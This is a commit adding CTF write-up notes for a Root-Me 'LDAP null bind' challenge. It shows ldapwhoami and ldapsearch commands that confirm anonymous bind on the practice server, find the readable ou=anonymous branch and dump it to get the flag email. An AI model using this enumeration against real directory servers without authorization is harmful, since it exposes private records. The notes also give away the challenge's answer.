feat ldap-null-bind
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
This commit is contained in:
Tuan-Dat Tran
81
network/lda-null-bind/explaination.org
Normal file
81
network/lda-null-bind/explaination.org
Normal file
@@ -0,0 +1,81 @@
|
||||
* LDAP null-bind challenge explained simply
|
||||
|
||||
Think of LDAP like a big company phonebook/tree.
|
||||
|
||||
Each node in the tree is a folder or a person record:
|
||||
|
||||
#+begin_example
|
||||
dc=challenge01,dc=root-me,dc=org
|
||||
|
|
||||
+-- ou=anonymous
|
||||
|
|
||||
+-- uid=sabu
|
||||
+-- mail: sabu@anonops.org
|
||||
#+end_example
|
||||
|
||||
In this challenge, the server allows *anonymous login* (called a null bind).
|
||||
That means we can connect without a username/password and ask some questions.
|
||||
|
||||
** What we did (step by step)
|
||||
|
||||
1) Checked if anonymous access works
|
||||
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
#+end_src
|
||||
|
||||
It returned `anonymous`, so null bind is enabled.
|
||||
|
||||
2) Tried to list everything from the main base DN
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
Server replied with `Insufficient access`.
|
||||
|
||||
So: anonymous is allowed, but not everywhere.
|
||||
|
||||
3) Probed likely child branches under the base DN
|
||||
|
||||
We tested candidate DNs and found one readable branch:
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||
#+end_src
|
||||
|
||||
That confirmed `ou=anonymous` exists and is accessible.
|
||||
|
||||
4) Enumerated that readable branch
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
This returned a user record:
|
||||
|
||||
- `uid=sabu`
|
||||
- `mail: sabu@anonops.org`
|
||||
|
||||
So the requested email is:
|
||||
|
||||
*sabu@anonops.org*
|
||||
|
||||
** Why this works
|
||||
|
||||
- LDAP permissions are often set per branch (subtree).
|
||||
- Root/base queries may be blocked.
|
||||
- A specific subtree can still be world-readable.
|
||||
- Enumeration is about finding *where* read access is allowed.
|
||||
|
||||
** Tiny mental model
|
||||
|
||||
#+begin_example
|
||||
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
|
||||
|
|
||||
v
|
||||
[Find readable subtree]
|
||||
|
|
||||
v
|
||||
[Dump entries + get mail]
|
||||
#+end_example
|
||||
61
network/lda-null-bind/notes.org
Normal file
61
network/lda-null-bind/notes.org
Normal file
@@ -0,0 +1,61 @@
|
||||
* LDAP - null bind
|
||||
** Notes
|
||||
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
|
||||
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
|
||||
** Task
|
||||
Aufgabe
|
||||
|
||||
Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
|
||||
dc=challenge01,dc=root-me,dc=org
|
||||
|
||||
Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
|
||||
Zugangsdaten für die Übung
|
||||
Host challenge01.root-me.org
|
||||
Protokoll TCP
|
||||
Port 54013
|
||||
|
||||
** Findings
|
||||
- Challenge type: LDAP anonymous/null bind enumeration.
|
||||
- Base DN: dc=challenge01,dc=root-me,dc=org
|
||||
- Target: find the branch created by an anonymous user and extract their email address.
|
||||
|
||||
** Useful tools
|
||||
- ldapsearch (required)
|
||||
- ldapwhoami (quick null-bind check)
|
||||
- openssl s_client (optional, for TLS troubleshooting)
|
||||
|
||||
** Recon commands
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
|
||||
#+end_src
|
||||
|
||||
** Execution log
|
||||
- Verified anonymous bind:
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
# anonymous
|
||||
#+end_src
|
||||
|
||||
- Direct subtree query on base DN is blocked:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
# result: 50 Insufficient access
|
||||
#+end_src
|
||||
|
||||
- Enumerated likely child DNs and found readable branch:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||
# dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||
#+end_src
|
||||
|
||||
- Dumped subtree under readable branch:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
# dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||
# mail: sabu@anonops.org
|
||||
#+end_src
|
||||
|
||||
** Flag / answer
|
||||
- Email address: sabu@anonops.org
|
||||
Reference in New Issue
Block a user